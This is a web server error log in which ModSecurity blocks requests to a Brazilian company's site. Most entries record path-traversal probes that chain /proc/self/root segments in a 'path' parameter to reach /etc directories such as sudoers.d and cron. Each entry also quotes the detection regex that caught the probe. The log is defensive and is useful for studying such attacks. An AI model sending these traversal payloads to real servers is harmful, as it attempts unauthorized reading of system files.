[Mon Mar 16 09:42:25.067759 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.243.203:50410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6sY6lpbStxTqkSktcqAAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:26.366687 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:50416] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6stSswJuvopo3lOhNhgAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:27.935217 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:50430] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6s9SswJuvopo3lOhNhwAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:29.295082 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:50438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6tQlT9VtDQc7bgUyZywAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:30.676888 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:52818] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6trysWC90G-1nBrAzBAAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:31.988529 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:52830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6t_9ocpUE4ed4uDzapAAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:41.705209 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.243.203:52834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6wQlT9VtDQc7bgUyZ2QAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:47.335355 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:38022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6xwlT9VtDQc7bgUyZ4gAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:58.896384 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:39232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf60o6lpbStxTqkSktcxwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:43:12.127787 2026] [:error] [pid 21533:tid 140411582465792] [client 87.121.84.97:53430] [client 87.121.84.97] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "ALittle" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/admin/server/php/index.php"] [unique_id "abf633jZBu2q05ozVU9DoAAAAVM"]
[Mon Mar 16 09:43:29.314959 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.243.203:38032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf68HbQATo66fKoS7w6qgAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:43:30.655269 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:55584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf68hXjF1vJNtV6CWrmeAAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:43:37.278196 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:55592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6-QlT9VtDQc7bgUyZ_QAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:43:38.491753 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:55608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6-v9ocpUE4ed4uDza6wAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:44:41.322558 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:45096] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7ObysWC90G-1nBrAziQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:44:44.811439 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:46716] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7PP9ocpUE4ed4uDzbEwAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:44:48.246220 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.241.46:46720] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7QHjZBu2q05ozVU9DxgAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:45:03.758275 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.241.46:54644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7T5qj1wV0Si-OkefXogAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 09:45:07.418921 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:55878] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7U5qj1wV0Si-OkefXpwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:45:08.755416 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.241.46:53926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7VAlT9VtDQc7bgUyaHgAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:45:19.873550 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.241.46:53936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7X46lpbStxTqkSktc-gAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:45:50.030806 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.228.16:54792] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf7fnjZBu2q05ozVU9D7wAAAUU"]
[Mon Mar 16 09:46:26.553793 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.243.203:36994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf7onjZBu2q05ozVU9EEwAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
